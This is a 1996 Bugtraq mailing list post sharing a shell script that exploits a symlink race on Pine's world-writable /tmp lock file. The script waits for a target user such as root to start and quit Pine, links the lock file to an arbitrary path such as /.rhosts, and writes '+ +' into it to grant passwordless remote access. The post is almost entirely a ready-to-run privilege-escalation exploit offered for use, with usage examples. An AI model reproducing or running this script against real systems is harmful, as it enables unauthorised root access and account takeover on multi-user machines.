Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

A Stupid script.

From: e-torres () uniandes edu co (Efrain Torres)
Date: Sat, 23 Nov 1996 10:36:57 +0500

H0l4,

Well here is a stupid script to exploit the pine bug, is better than to
have to exploit it manually. It just sucks waiting for the user to quit
and re-enter pine. Why is a shell script and not a C program?.. simple
because some root dont allow the execution of cc, gcc (its a security
problem .. duhhhhhhh.... ). So be happy whatever you do.

Greetings from Colombia,
E.T Lownoise

e-torres () uniandes edu co

------------------------------------------------------------------------
^^ Funny Shit to know, some people like to spread ignorance to
   control the information, just to be the only ones.
   yeah in this country too.

   L0wnoise Just trying to change this shit.                          ^^
________________________________________________________________________


---------------------- Cortame por aca ----QUE SI! POR ACA -------------



#!/bin/sh
#
# ET Lownoise 1996 Colombia
# pine bug exploit
#
# usage: pine.sh username path/file_to_create &
# ex:    pine.sh root /.rhosts &
# ex2:   pine.sh root /.rhosts > out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
#                     e-torres () uniandes edu co
#

argumentos=0
if [ $# -eq $argumentos ]
  then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
fi

username=$1
archivo=$2

#CHANGE THIS:

#text='text to puit in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command

text='+ +'
usr=users
pineprog=pine

#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0

until [ $entro -eq $entrada ]
do
        for nombre in `$usr`
        do
         if [ $nombre = $1 ]
            then
                entro=1

         fi
        done

done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "


noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do


     for ejecutando in `w $username`
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $1 ' is running ' $pineprog '.'
                ejecuto=1

       fi
     done

done



echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo "  quits $pineprog "
# do it till exist lockfile, that means username havent quit pine
cd /tmp

while [ -s $lockfile ]
    do
    sleep 0
done

cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
#$archivo is the complete path of file in username
cd /tmp
ln -s $archivo $lockfile
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo "  $archivo "
echo "- Waiting $username to return pine "

noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do
     for ejecutando in `w $username `
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $username ' is running ' $pineprog
                ejecuto=1

       fi
     done

done
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"
echo "ET Lownoise 1996 "
Previous By Date Next
Previous By Thread Next

Current thread: